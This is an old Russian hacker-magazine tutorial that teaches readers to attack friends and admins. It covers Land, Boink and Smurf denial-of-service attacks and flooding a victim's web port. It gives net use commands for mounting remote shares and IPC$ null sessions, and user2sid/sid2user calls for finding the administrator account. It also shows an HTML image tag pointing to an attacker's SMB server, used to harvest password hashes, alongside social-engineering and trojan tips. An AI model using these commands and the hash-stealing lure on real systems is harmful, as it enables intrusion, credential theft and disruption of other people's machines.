Привет перец, ты конечно же юзал такие проги, как нюк, залезал к бедным ламерам на винты ..., а знаешь ли ты, как всё это работает ?
Сегодня пойдёт чистая теория. И не надо строить кислые мины, настоящий хакер силён знанием, а не
умением давить на всякие пимпы 🙂

Начнем мы с атак на отказ в обслуживании (DoS) : 

Атака Land 

Суть атаки заключается в том, что адрес отправителя пакета изменён на адрес получателя (это возможно сделать, так как в заголовке IP пакета нет ни одного
идентифицирующего поля , кроме Source Address, так вот в этом поле и пишем АйПи жертвы). Source Address = Destination Address, номера портов также идентичны... Source port Number = Destination Port
Number. Получается IP пакетик направленный сам на себя. Итак, в заголовке указываем АйПи жертвы, а порт ... любой открытый порт на машине. Результат, как правило, у ВИН95 - синий экран, ВиН НТ замирал и не подавал признаков жизни в течении минуты ... от ОДНОГО Ленд пакета, но кто запрещает послать тысячу ленд запросов ??? Пример такой атаки: land.c под *nix .

Атака Boink

Эта капуста основана на глюке некоторых ОС (Линукс 2.0.0, Вин Нт) при сборе фрагментов в пакете. Ну, а почему? Да потому! После
сборки фрагментов в нашем пакетике остаются пустые места, то есть нет данных, и операционная система, ни черта не понимая, зависает.

Атака Smurf

Если ты отправишь запрос Echo Request/Replay адресу 215.255.255.255, то тебе придут ответы от всех компов, начиная с 215.0.0.1 до 215.254.254.254, таких компов может быть много :)) Это
называется широковещательный запрос. Вспоминай ленд атаку... дошло? Нет? Мда, тяжёлый случай 🙂 Ты уж и забыл, что можно в заголовке пакета поменять АйПи отправителя на АйПи жертвы, теперь все эти ответы пойдут не тебе, а тому чей адрес ты подставил. 

Конечно все эти атаки хороши , но что, если у твоего друга фаерволл ??? Все порты закрыты...
Все? Не все! Ведь твой друг наверняка забирает почту, ходит по порносайтам и т.д., бери и отправляй дохрена запросов на 80 порт врага (при условии что коннект у него диал-ап) ... . Вот и друг больше не может посмотреть на бритую с пирса 🙂 

Теперь про шары 🙂

Кто-то разрешил доступ на диск C: своему соседу по локалке, и при этом решил выйти в интернет, чтоб доглядеть то, что
не удалось посмотреть твоему другу, так как ты засрал ему 80 порт :))) "net use * \\215.25.21.1\ DISC_C password
/USER:user" -подключение к диску С:. Правда тут загвоздка: Пароль и Имя . Если у вашей жертвы НТ 3.5, то можно подключиться анонимно к специально открытому ресурсу IPC$ , а имя и логин оставить пустыми "net use \\215.25.21.1\IPC$ ""/USER: "" " . Но фишка не пройдёт при СевисПаке3 🙁 В сети, конечно, можно найти такие машины, но их очень мало. Можно попробовать узнать имя юзера и пароль, но как? SMB протокол поможет 🙂 Сначала имя пользователя, а лучше админа :)) Узнать имя можно с помощью двух прог, написанных нашим
соотечественником: sid2user и user2sid. Для начала надо узнать SID
(security identifier) который состоит из нескольких цифр, идентификатор безопасности и номер версии, следующая группа цифр - это номер ведомств, и ещё группа цифр - номер подразделения. Итак узнаём логин, для этого введи в командной строке ДОС из
директории, где находится прога user2sid : user2sid \\215.25.21.1 "Domain Users". Мы получаем SID (например
S-1-4-31-123456789-87654321-12345678-513) по имени (LookupAccountName), а далее наоборот, запускаем программу sid2user : - sid2user \\215.25.21.1 4 31 123456789 87654321 12345678 500,
обрати внимание на последние три цифры - 500, это RID админа 🙂 Смотри логин ... Всё !
Пароль, пароль ... Ноу проблем! Хотя всё же без проблем нельзя, 
суть её не техническая, а психологическая . Тут надо быть знакомым с Социальной Инженерией. Это тебе не троян впаривать, хотя можешь
попробовать впарить троян админу. Протокол SMB и это значит, что пароль в сети передаётся в открытом виде, осталось его перехватить ... А что бы перехватить пароль, надо либо с помощью соц. инженерии попросить врага законнектиться с твоим компом... 
или ЗАСТАВИТЬ комп админа соединиться с твоим . Короче, дело к ночи, надобно состряпать ХТМЛ файл и послать его админу. Чтоб админ ничего не заподозрил, вставь туда банеры и какой-нить рекламный текст, мол: ЗЕЛЁНЫЕ ХОМЯЧКИ, ПОСЛЕ УПОТРЕБЛЕНИЯ НАШЕГО КОРМА ( Уран235 ... :))) НО не забудь написать такую фичу:
<IMG SRC="file:////Tvoi_server.com/catalog/image.gif">.Это заставит браузер 
админа присоединится к SMB-серверу Tvoi_Server.com. WiNNT передаст хэш-пароль (кстати и имя тоже), а что б принять этот пароль используй сниффер
(SpyNeT). 

На этом позволь откланяться, с вами был Дон Хуан, да прибудет с 
тобой сила и знание 🙂

  • КМБ #2

    Часть третья - наступательная
    25.12.2001
    7 мин на чтение

  • Тащим пароли Win2K через SMBRelay

    Так как Винды автоматически логинятся на хост под текущим юзером (если специально не сказа…
    23.04.2001
    20 мин на чтение

  • КМБ

    Наверно практически каждый молодой человек, которому когда-то купили компьютер задавался ц…
    20.12.2001
    4 мин на чтение

  • Как самому написать BackDoor: С++

    Привет, перец! Сегодня расскажу тебе, как поступить с челом, который зажимает от тебя свои…
    10.10.2001
    7 мин на чтение

  • BNC: Что это такое, и с чем его едят #1

    BNC - это сокращение от "bouncer" (дословный перевод - попрыгунчик). Данная программа разр…
    13.08.2001
    5 мин на чтение

  • Ставим Nessus на Шапку

    Среди множества сканеров безопасности Nessus (http://www.nessus.org) - один из лучших. Он:…
    14.06.2001
    2 мин на чтение

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии